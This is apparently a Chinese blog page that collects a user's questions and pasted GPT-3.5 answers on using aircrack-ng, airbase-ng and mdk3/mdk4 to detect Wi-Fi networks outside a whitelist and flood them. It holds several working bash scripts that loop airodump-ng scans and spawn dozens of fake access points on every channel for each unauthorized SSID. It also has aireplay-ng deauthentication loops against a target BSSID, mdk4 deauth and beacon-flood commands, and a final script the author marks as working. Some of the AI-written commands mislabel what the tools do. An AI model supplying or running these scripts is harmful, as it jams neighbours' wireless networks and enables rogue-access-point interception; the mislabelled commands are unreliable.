欢迎各位兄弟 发布技术文章

这里的技术是共享的

You are here

找台电脑安装BT5这个系统,通过aircrack-ng 这个工具,检测当前环境有多少无线信号,然后把授权的加到白名单,检测到非授权的,比如 testwifi,然后使用 ssid flood 释放相同的 ssid 100个,每10秒或是20秒检测一次, AG chatgpt 有大用 有大大用

ttps://www.y2b.com/watch?v=FOZk_Zw25x4&pp=ygUaYWlyY3JhY2stbmcgIFNTSUQgZmxvb2Rpbmc%3D 

https://www.y2b.com/watch?v=A6CC4UsBUnM&pp=ygUaYWlyY3JhY2stbmcgIFNTSUQgZmxvb2Rpbmc%3D  

https://www.y2b.com/watch?v=3acgNybz1fA&pp=ygUaYWlyY3JhY2stbmcgIFNTSUQgZmxvb2Rpbmc%3D 

https://www.y2b.com/watch?v=A6CC4UsBUnM  

找台电脑安装BT5这个系统,通过aircrack-ng 这个工具,检测当前环境有多少无线信号,然后把授权的加到白名单,检测到非授权的,比如testwifi,然后使用ssid flood 释放相同的ssid 100个,每10秒或是20秒检测一次,只要检测非授权的ssid ,就释放大量的


在 Kali Linux(BT5)上使用 Aircrack-ng 和相关工具进行无线信号检测、白名单管理和SSID flooding 是一个更高级的无线网络攻击测试,通常用于渗透测试。不过请注意,这些活动在未获得授权的情况下是非法的。在进行任何渗透测试或安全测评之前,请确保您有明确的授权。

安装 Aircrack-ng

首先,确保您已经安装了 Aircrack-ng 和其他必要的工具(见前面的回答)。

操作步骤

1. 监控无线信号

您可以使用 airodump-ng 来监控无线信号。打开终端并进入监控模式:

  1. 启用监控模式

    bash
    sudo airmon-ng start wlan0
    

    请将 wlan0 替换为实际的无线网卡名称。

  2. 使用 airodump-ng 监视网络

    bash
    sudo airodump-ng wlan0mon
    

    这将开始扫描附近的无线网络。您会看到所有的 SSID 和信号强度。

2. 添加授权的 SSID 到白名单

记录您允许的 SSID,并确保在接下来的步骤中使用这些信息。

3. 检测非授权 SSID

利用 airodump-ng 的输出,您可以定期检测非授权的 SSID。为了循环检测,您可以编写一个简单的 Bash 脚本。

4. SSID Flooding

如果检测到非授权的 SSID,您可以使用 airbase-ng 来进行 SSID flooding。以下是一个简单的脚本示例,可以帮助您实现这一目标。

bash
#!/bin/bash

# 允许的 SSID 列表
whitelist=("authorizedSSID1" "authorizedSSID2")

# 检测时间间隔(秒)
check_interval=10
flood_count=100

while true; do
    # 每次扫描以获取当前网络
    sudo airodump-ng wlan0mon --write output --output-format csv

    # 检查输出文件中是否存在非授权的 SSID
    if grep -q "testwifi" output-01.csv; then
        echo "Detect unauthorized SSID: testwifi"
        # 开始进行 SSID flooding
        for ((i=0; i<flood_count; i++)); do
            sudo airbase-ng -e testwifi -c 6 wlan0mon &
            sleep 20  # 每20秒进行一次
        done
    fi

    sleep "$check_interval"
done

说明:

  • 将 authorizedSSID1 和 authorizedSSID2 替换为您自己的授权 SSID 名称。

  • 每 check_interval 秒,脚本将执行一次 SSID 检测。

  • 检测到非授权 SSID 后,脚本将进行 flood_count 次 SSID flooding,您可以根据需要调整频率和数量。

注意事项:

  • 合法性: 确保在进行这些操作时遵循所有法律法规,并确保您有适当的授权。

  • 影响: SSID flooding 可能对周围的无线网络造成干扰,所以要十分小心。

  • 依赖性: 确保安装执行脚本所需要的工具(如 airodump-ngairbase-ng)并监控无线信号的接口配置正确。

通过以上步骤,您可以在 Kali Linux 上使用 Aircrack-ng 及相关工具检测无线信号并实施适当的响应措施。




在进行无线网络安全测试时,使用像 aircrack-ng 这样的工具进行SSID欺骗和信号干扰是一个高度敏感的操作,并且通常是在合法授权和特定权限下进行的。这样的活动可能会违反法律和网络条例,因此务必确保您在进行任何操作之前拥有相关权限。

以下是一个大概念的步骤,介绍如何使用 aircrack-ng 工具集检测无线信号,并利用 aireplay-ng 工具进行SSID洪泛的操作。这里的操作是为了教育目的,任何实际操作请确保您拥有合法的授权。

环境要求

  • Kali Linux:这是一种包括 aircrack-ng 等网络安全工具的Linux发行版。

  • 无线网卡:支持监控模式和数据包注入的无线网卡。

步骤大致流程

  1. 启动监控模式: 首先,确保无线网卡处于监控模式,使用以下命令:

    bash
    sudo airmon-ng start wlan0

    这里的 wlan0 是你的无线网络接口名,具体名称可以通过 ifconfig 命令查看。

  2. 使用 airodump-ng 检测无线信号: 使用 airodump-ng 命令来扫描附近的无线网络:

    bash
    sudo airodump-ng wlan0mon

    这里的 wlan0mon 是处于监控模式的接口名称。命令会列出所有可见的无线网络,包括它们的 SSID 和加密方式。

  3. 记录授权的网络: 找到您授权的网络,将其 SSID 记录下来,以便后续操作。

  4. 进行 SSID 洪泛攻击: 使用 aireplay-ng 中的 --fakeauth 和伪造 SSID 的功能进行洪泛攻击:

    bash
    sudo aireplay-ng --fakeauth 0 -e "yourSSID" -a [BSSID] wlan0mon

    为了多个SSID的情况,可以用一个脚本来循环执行这个命令。以下是一个基本的 Bash 脚本示例:

    bash
    #!/bin/bash
    
    # 需要洪泛的SSID
    TARGET_SSID="testwifi"
    BSSID="[BSSID]"  # 请替换为实际的BSSID
    INTERFACE="wlan0mon"  # 替换为实际的监控模式接口
    
    while true; do
        # 进行SSID洪泛
        for i in {1..100}; do
            sudo aireplay-ng --fakeauth 0 -e "$TARGET_SSID" -a "$BSSID" "$INTERFACE"
        done
        sleep 10  # 每10秒实施一次
    done
  5. 监控并检测非授权SSID: 监控附近无线网络的变化,您可以再次使用 airodump-ng。可以选择在一个终端中执行 airodump-ng,并在另一个终端中运行上述脚本,以便持续观察网络状况。

注意事项

  • 法律和道德:这种类型的活动必须在完全合法和道德的框架内进行。请确保您只能对您拥有授权的网络进行测试,任何未经授权的网络干扰和攻击都是非法的。

  • 系统性能:频繁的信号洪泛可能会使某些设备或网络不稳定,长时间运行此类脚本可能会导致不可预期的问题。

  • 无线设备兼容性:确保您的无线网卡支持监控模式和数据包注入,不是所有网卡都支持这些功能。

结论

以上过程仅为教育用途,旨在提升对无线网络安全的理解与防范。实际操作时,请遵循相关法律法规并确保具备执行安全测试的必要权限。尽量在受控实验环境中进行类似测试。



aircrack-ng  如何扫描无线网络

利用 Aircrack-ng 套件中的工具(主要是 airodump-ng)扫描无线网络是一种常见操作,以下是详细的步骤:

步骤一:确保设备准备就绪

确保您的无线网卡支持监控模式,并且已正确安装了 Aircrack-ng。可以在 Kali Linux 上通过以下命令安装 Aircrack-ng:

bash
sudo apt update
sudo apt install aircrack-ng

步骤二:将无线网卡设为监控模式

  1. 查找无线网卡接口名: 首先,使用以下命令查看您的无线接口名(一般是 wlan0 或类似的名称):

    bash
    iwconfig
    
  2. 启用监控模式: 使用 airmon-ng 将无线网卡设置为监控模式。假设您的无线接口名为 wlan0,可以使用以下命令:

    bash
    sudo airmon-ng start wlan0
    

    这将会启用监控模式,您将会看到一个类似于 wlan0mon 的新的接口名称。

步骤三:使用 airodump-ng 扫描无线网络

  1. 启动 airodump-ng: 通过在监控模式下的接口运行 airodump-ng

    bash
    sudo airodump-ng wlan0mon
    

    这个命令将监控附近的所有无线网络,并显示以下信息:

  • 网络名称(ESSID)

  • 信道(Channel)

  • 加密类型(Encryption)

  • MAC 地址(BSSID)

  • 信号强度(Signal strength)

  • 活跃的客户端等信息

步骤四:过滤和保存扫描结果(可选)

如果您想只查看特定的网络,您可以用 airodump-ng 加入额外的参数。

例如,若只想查看指定信道的无线网络:

bash
sudo airodump-ng --channel [channel_number] wlan0mon

将 [channel_number] 替换为您想监控的信道数字。

另外,您还可以将结果保存到文件中,添加 --write 选项:

bash
sudo airodump-ng --write output wlan0mon

这样会将扫描结果保存到名为 output 的文件中,您可以在后续分析。

结束扫描

完成扫描后,可以通过按 Ctrl + C 停止 airodump-ng。然后,如果您需要恢复无线网卡的正常工作模式,可以使用:

bash
sudo airmon-ng stop wlan0mon

最后,您可以用 ifconfig 检查网卡状态,确认恢复正常。

小结

通过以上步骤,您可以使用 Aircrack-ng 套件中的 airodump-ng 工具扫描并分析无线网络。请始终确保您的行为符合当地的法律法规,并在进行网络安全测试之前获取合法授权。


 

sudo airmon-ng start wlan0 

Failed to set wlan0mon up using ip                

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)         

        (mac80211 station mode vif disabled for [phy0]wlan0)

GPT 3.5

在使用 airmon-ng 将无线网卡切换到监控模式时出现的错误 Failed to set wlan0mon up using ip 以及后面的消息说明 Wireless LAN 适配器(即 wlan0)成功创建了一个监控模式虚拟接口(wlan0mon),但是在网络管理或接口激活时可能遇到了一些问题。

以下是一些可能的解决方法,旨在帮助你排查和修复此问题:

方法 1: 手动启动监控模式

如果 airmon-ng 失败,可以尝试手动设置监控模式:

  1. 关闭接口:

    bash
    sudo ip link set wlan0 down
    
  2. 设置监控模式:

    bash
    sudo iw dev wlan0 set type monitor
    
  3. 重新启动接口:

    bash
    sudo ip link set wlan0 up
    
  4. 确认监控模式: 通过以下命令确认网卡是否在监控模式下:

    bash
    iw dev
    

方法 2: 停止 NetworkManager

有时,NetworkManager 会干扰无线接口的状态。可以临时停止它:

bash
sudo systemctl stop NetworkManager

方法 3: 检查并终止冲突进程

使用 airmon-ng check 命令检查任何可能与无线接口冲突的进程并杀掉它们:

bash
sudo airmon-ng check

然后,使用 airmon-ng check kill 去终止这些进程:

bash
sudo airmon-ng check kill

方法 4: 权限和驱动程序

确保您正在以 root 用户运行命令,且检查您的无线网卡驱动程序:

  • 确保您使用的是最新驱动程序版本,并且驱动程序支持监控模式。

  • 如果您并不确定,请访问制造商网站获取支持或查找相关的论坛和社区。

方法 5: 更新或重启设备

如果以上方法均未奏效,请考虑更新系统,或者尝试重启设备。这可以刷新网络配置和驱动。

bash
sudo apt update && sudo apt upgrade

方法 6: 确认接口状态

在执行命令之后,再次确认接口状态,确保它被正确识别:

bash
ifconfig

查看 wlan0mon 是否存在,并且处于“UP”状态。

方法 7: 使用不同的接口名称

确保您在运行的命令中使用正确的接口名称。根据不同的设备,可能会有所不同,可以通过 iwconfig 或 ip a 来确认当前无线接口的确切名称。

总结

通过以上方法,您应该能够解决“Failed to set wlan0mon up using ip”的问题,并成功将无线网卡设置为监控模式。如果问题仍然持续存在,可以考虑查阅更专业的无线网络论坛或在 Linux 社区中寻求支持。

Current user picture pingzhong shi
pingzhong

恢复模式 能联上网 ,,可以执行 sudo airmon-ng start wlan0 吗

GPT 3.5

在恢复模式(Recovery Mode)下,系统通常以一个极简的环境启动,仅提供基本的命令行接口和极少的功能。在大多数情况下,恢复模式不会加载完整的图形用户界面,也不一定会自动启用网络连接。

可否在恢复模式下执行 sudo airmon-ng start wlan0

  1. 网络可用性

  • 在恢复模式下,网络连接可能不是自动开启的。您可以通过使用命令 ifconfig 或 ip a 检查网络接口的状态,看看您的无线接口(如 wlan0)是否存在以及是否已被激活。

  • 如果网络连接存在,您可能需要手动配置网络,以确保可以进行互联网连接。

  • 通常的限制

    • 在恢复模式下,一些服务和驱动程序可能并未加载。例如,与网络管理相关的工具(如 NetworkManager)和图形用户界面通常不会启动,您可能需要手动重新加载网络模块(如果需要)。

    • 另外,一些无线驱动程序在恢复模式下也可能无法正常工作,因为这取决于您的内核设置和驱动程序支持情况。

    如何在恢复模式下操作

    如果您确认您的无线接口处于可用状态,您可以按照以下步骤尝试在恢复模式中使用 aircrack-ng 套件:

    1. 确认无线网卡接口

      bash
      ifconfig
      

      或者

      bash
      ip a
      
    2. 确保系统能够识别网卡并正常工作

    3. 查看网络状态

      bash
      iwconfig
      

      查看无线接口是否活动。

    4. 尝试启动监控模式

      bash
      sudo airmon-ng start wlan0
      

    如果无法联网:

    如果您在恢复模式下无法连接到网络,执行命令可能不会成功,且 Airmon-ng 可能会因为缺乏网络支持而无法正常运行。在这种情况下,您可以考虑以下选项:

    1. 重启到正常模式:如果不需要恢复操作,大多数操作都可以在标准模式下进行,并可以通过联网执行。

    2. 使用 Live USB:某些情况下,如果只是测试无线网络,使用启动的 Live USB 系统,例如 Kali Linux 或其他的安全测试发行版,可能更为方便。

    总结

    在恢复模式下可以尝试执行 sudo airmon-ng start wlan0,但可用性和效果取决于网络驱动、接口状态及其配置。如果需要执行更加复杂的网络和无线配置,通常建议使用正常模式或特定的安全测试发行版。



    kali linux 下 aircrack-ng 把 某一个wifi 比如 shi-tplink ,,,用ssid flood 释放相同的ssid 100个,每10秒或是20秒检测一次,只要检测非授权的ssid ,就释放大量的

    在 Kali Linux 中,使用 aircrack-ng 的工具进行 SSID flood 的攻击是相对复杂且需要小心进行的。请确保您在进行这类测试之前遵循所有法律和道德规范,并且只在您有授权的网络上执行这些操作。

    下面是一个大致的步骤和命令示例,用于在 Kali Linux 中生成大量的相同 SSID(例如“shi-tplink”)的广播包,您可以使用 aireplay-ng

    步骤:

    1. 安装相关工具(如果尚未安装): 确保你已经安装了 aircrack-ng。通常可以使用以下命令安装:

      bash
      sudo apt update
      sudo apt install aircrack-ng
    2. 将无线网卡设置为监控模式: 首先,您需要将无线网卡切换到监控模式。例如,如果你的无线网卡是 wlan0,你可以使用以下命令:

      bash
      sudo airmon-ng start wlan0

      这可能会将你的接口名称更改为 wlan0mon(取决于你的无线网卡和系统)。

    3. 使用 aireplay-ng 进行 deauth 攻击: 要发送大量 SSID 的广播包,首先您需要找到目标网络的 BSSID(MAC 地址)并运行以下命令。确保你在使用正确的无线网卡接口。

      bash
      sudo aireplay-ng --fake-auth 0 -a <目标的BSSID> wlan0mon
    4. 创建和发送伪造的 SSID 广播: 您可以使用 airodump-ng 工具监视网络和客户端,同时使用 aireplay-ng 进行“大量释放”。 您需要创建一个脚本来定期发送相同的 SSID 广播。

    以下是一个简单示例脚本,可以帮助您实现定时发送 SSID 广播:

    bash
    #!/bin/bash
    
    SSID="shi-tplink"
    BSSID="<目标的BSSID>"
    INTERFACE="wlan0mon"
    
    while true; do
        # 发送 fake-auth 认证包
        sudo aireplay-ng --fake-auth 0 -a $BSSID $INTERFACE
        # 发送 SSID flood
        for i in {1..100}; do
            sudo aireplay-ng --deauth 10 -a $BSSID --essid "$SSID" $INTERFACE
        done
        echo "已发送 $SSID 广播包,检测非授权SSID..."
        # 每 20 秒检测一次
        sleep 20
    done

    运行脚本:

    将上述内容保存为 ssid_flood.sh,然后给文件执行权限并运行:

    bash
    chmod +x ssid_flood.sh
    sudo ./ssid_flood.sh

    注意事项:

    1. 法律风险:进行此类操作可能违反当地法律法规和网络使用协议。确保您获得了适当的授权,且仅在自己合法控制的网络上进行测试。

    2. 无线网络干扰:使用此类命令可能会干扰网络连接,对网络使用者造成不便。在进行任何攻击或测试时,务必小心谨慎。

    3. 健康检查:注意您的无线设备电源和可能的过热,因为长时间的无线操作可能会导致硬件问题。

    在执行类似的测试前,请确保你了解所有风险和责任。



    sudo airbase-ng -e testwifi -c 6 wlan0mon 详解

    airbase-ng 是 aircrack-ng 套件中的一个工具,用于创建虚假的无线接入点 (Access Point, AP),以进行各种攻击或测试。以下是您提到的命令 sudo airbase-ng -e testwifi -c 6 wlan0mon 的详细解析:

    命令组成部分详解

    1. sudo:

    • 由于 airbase-ng 需要访问网络硬件并操作网络接口,因此需要使用超级用户权限。sudo 允许以管理员身份运行后面的命令。

  • airbase-ng:

    • 这是创建虚假接入点的工具。使用该工具可以模拟一个合法的无线网络,以此捕捉用户的身份信息(如 WPA 密码、WEP 密码)或进行其他形式的网络攻击。

  • -e testwifi:

    • -e 选项后面跟的是设置的虚假无线网络的 SSID(服务集标识符)。在这个例子中,SSID 被设置为 testwifi。其他设备会在 WLAN 列表中看到这个无线网络并可以连接到它。

  • -c 6:

    • -c 选项用于指定虚假接入点使用的频道。在此例中,6 表示接入点会在 2.4 GHz 频段的第 6 个频道上工作。确保选择一个不会干扰其他合法无线网络的频道。

  • wlan0mon:

    • 这是您设置为监控模式的无线网卡接口的名称。wlan0mon 表示已经将 wlan0 网卡放入监控模式并将名称改变为 wlan0mon(实际名称可能因设备而异,你可以检查实际设备名称)。

    如何使用该命令

    1. 启用监控模式: 在运行 airbase-ng 之前,确保你的无线网卡被设置为监控模式。使用以下命令:

      bash
      sudo airmon-ng start wlan0
    2. 运行 airbase-ng: 执行以下命令来创建一个虚假的 AP:

      bash
      sudo airbase-ng -e testwifi -c 6 wlan0mon
    3. 连接其他设备: 运行该命令后,其他设备会看到 SSID 为 testwifi 的虚假网络。用户可以尝试连接到该网络。

    4. 用户捕捉: 当用户尝试连接时,他们的流量会路由到 airbase-ng 创建的接入点,你可以使用其他工具(如 tcpdump 或 Wireshark)捕捉和分析流量。

    注意事项

    1. 合法性: 请确保在进行这些操作之前获得适当的授权。这类操作仅应在你拥有合法权限的网络上进行,未授权的篡改或干扰他人网络是违法的。

    2. 道德和伦理: 尽管这些工具可用于网络安全研究,但其易用性也使其被恶意使用。请遵循职业道德和最佳实践。

    3. 网络干扰: 创建虚假接入点可能会导致对周围合法网络的干扰,因此请小心使用,并限制在实验环境中进行测试。

    4. 使用环境: 为确保安全和隐私,建议您在专门的实验室环境或测试环境中运行此类命令,而不是公共或个人网络。

    5. 数据监控: 在某些国家或地区,捕捉和监控网络流量可能受到法律限制。请遵守当地的法律法规。




    bash
    #!/bin/bash
    
    # 允许的 SSID 列表
    whitelist=("78:44:FD:35:40:02" "BA:80:35:44:0C:3C")
    
    # 检测时间间隔(秒)
    check_interval=10
    flood_count=100
    
    # 函数:验证 MAC 地址格式
    is_valid_mac() {
        [[ $1 =~ ^([0-9a-fA-F]{2}[:-]){5}([0-9a-fA-F]{2})$ ]]
    }
    
    while true; do
        # 每次扫描以获取当前网络
        sudo airodump-ng wlan0mon --write output --output-format csv
    
        # 处理输出文件中的每一行,检查第一列是否在白名单
        while IFS=',' read -r first_col _ last_col; do
            # 检查第一列是否是 MAC 地址,并且最后一列不为空
            if is_valid_mac "$first_col" && [ -n "$last_col" ]; then
                # 检查第一列是否在白名单
                if [[ " ${whitelist[*]} " == *" $first_col "* ]]; then
                    echo "Authorized SSID found: $last_col"
                else
                    echo "Detect unauthorized SSID: $last_col"
                    # 开始进行 SSID flooding
                    for ((i=0; i<flood_count; i++)); do
                        sudo airbase-ng -e "$last_col" -c 6 wlan0mon &
                        sleep 20  # 每20秒进行一次
                    done
                fi
            else
                echo "Invalid entry or empty SSID: MAC: $first_col, SSID: $last_col"
            fi
        done < <(tail -n +2 output-01.csv)  # 跳过文件的第一行(表头)
    
        sleep "$check_interval"
    done
    




    mdk4 SSID flooding 示例

    MDK4 是一个用于进行无线网络渗透测试的工具,它可以用来执行各种攻击,包括 SSID 洪泛(SSID flooding)。这种攻击通常用来干扰网络,并可能导致连接到目标网络的设备出现问题。

    不过,我必须强调的是,进行这类攻击必须在法律允许的范围内,并且需要得到网络拥有者的明确许可。未经授权的攻击是违法的,并且会造成严重的法律后果。

    如果你在学习网络安全或渗透测试,并且有合法的测试环境,以下是一个关于如何使用 MDK4 进行 SSID 洪泛的基本示例:

    使用 MDK4 进行 SSID 洪泛的步骤(适用于合法的渗透测试)

    1. 安装 MDK4: 确保你已经安装了 mdk4。在基于 Debian 的发行版上,你可以使用以下命令进行安装:

      bash
      sudo apt-get install mdk4
    2. 确认你的无线适配器: 确保你的无线适配器支持监控模式。你可以使用 iwconfig 命令查看无线接口:

      bash
      iwconfig
    3. 启用监控模式: 将你的无线适配器设置为监控模式。例如,如果你的无线接口是 wlan0,可以使用以下命令:

      bash
      sudo ip link set wlan0 down
      sudo iw dev wlan0 set type monitor
      sudo ip link set wlan0 up
    4. 启动 SSID 洪泛攻击: 使用 mdk4 进行 SSID 洪泛。以下命令将传输大量虚假 SSID:

      bash
      sudo mdk4 wlan0 d -w <your-ssid-file>

      其中 <your-ssid-file> 是包含要广播的 SSID 的文件。你可以用任意文本编辑工具创建这个文件,每行一个 SSID。

    5. 停止攻击: 一旦完成测试(或需要停止攻击),你可以使用 Ctrl+C 结束 mdk4 进程。

    注意事项

    • 确保你有合法授权进行此类测试。

    • 此攻击可能会影响其他用户的网络连接,请在隔离的测试环境中进行。

    • 使用这个工具的同时,请遵循所有适用的法律和道德标准。

    再次重申,进行任何形式的网络攻击或渗透测试都必须在获得授权的环境中进行,遵守适用法律和道德规范。


    mdk3 SSID flooding 示例

    MDK3 是一个用于无线网络攻击的工具,可以执行多种攻击,包括 SSID 洪泛(SSID flooding)。这种攻击可以用来干扰无线网络的正常运行,制造虚假的 SSID,从而导致用户连接到错误的网络。再次强调,这种活动必须在法律允许的范围内进行,并且必须具备合法的授权。

    使用 MDK3 进行 SSID 洪泛的基本示例

    1. 安装 MDK3

    在你的 Linux 系统上安装 MDK3。一些常见的分发版可以使用以下命令进行安装:

    对于 Debian/Ubuntu:

    bash
    sudo apt-get install mdk3

    2. 确认无线适配器

    使用 iwconfig 命令确认你的无线适配器并查看其状态:

    bash
    iwconfig

    3. 启用监控模式

    将无线适配器设置为监控模式。如果你的接口名为 wlan0,可以使用以下命令:

    bash
    sudo ip link set wlan0 down
    sudo iw dev wlan0 set type monitor
    sudo ip link set wlan0 up

    4. 创建 SSID 列表文件

    创建一个包含要广播的 SSID 的文本文件,例如 ssids.txt

    bash
    echo "FakeSSID1" >> ssids.txt
    echo "FakeSSID2" >> ssids.txt
    echo "FakeSSID3" >> ssids.txt

    5. 启动 SSID 洪泛攻击

    运行 MDK3 以进行 SSID 洪泛。使用以下命令:

    bash
    sudo mdk3 wlan0 d -f ssids.txt

    这里的 -f ssids.txt 指定要播放的 SSID 列表。

    6. 停止攻击

    当你完成测试后,可以使用 Ctrl+C 停止 MDK3 进程。

    注意事项

    • 合法性: 确保你在进行任何网络测试时都具备合法授权,以避免违反法律。

    • 影响: 这个攻击方式可能会导致网络连接问题,请在控制的环境内进行测试。

    • 道德标准: 遵守所有适用的法律和道德标准。

    请谨慎使用上述工具和技术,确保进行的是合法和道德的安全研究。


    sudo mdk4 wlan0mon d -w attack_ssids.txt     #  OK

    sudo mdk4 wlan0mon d -E BSSID     #  OK

    sudo mdk4 wlan0mon a -a BSSID

    sudo mdk4 wlan0mon b -n "TargetSSID"



    2025 年春节前 最终代码 OK 有大用

    #!/bin/bash


    # 允许的 SSID 列表

    whitelist=("aaaa-Office" "bbbb-NST" "cccc-MST" "dddd-NYB" "eeee-MYB")


    # 检测时间间隔(秒)

    check_interval=10

    # 函数:验证 MAC 地址格式

    is_valid_mac() {

        [[ $1 =~ ^([0-9a-fA-F]{2}[:-]){5}([0-9a-fA-F]{2})$ ]]

    }


    while true; do

        # 每次扫描以获取当前网络

        sudo airodump-ng wlan0mon --write output --output-format csv


        # 处理输出文件中的每一行,检查第一列是否在白名单

        while IFS=',' read -r first_col _ last_col; do

            # 检查第一列是否是 MAC 地址,并且最后一列不为空

            if is_valid_mac "$first_col" && [ -n "$last_col" ]; then

            printf '%s\n' "${whitelist[@]}" | grep -Fxq "$last_col"

              if [ $? != 0 ];then

                   for i in $(seq 1 50);do

                          sudo airbase-ng -e "$last_col" -c $((i %14 + 1 )) wlan0mon &

                  done

            fi            

            else

                echo "Invalid entry or empty SSID: MAC: $first_col, SSID: $last_col"

            fi

        done < <(tail -n +2 output-01.csv)  # 跳过文件的第一行(表头)

        sleep "$check_interval"

    done



    sudo mdk4 wlan0mon b -n "TargetSSID"



    普通分类: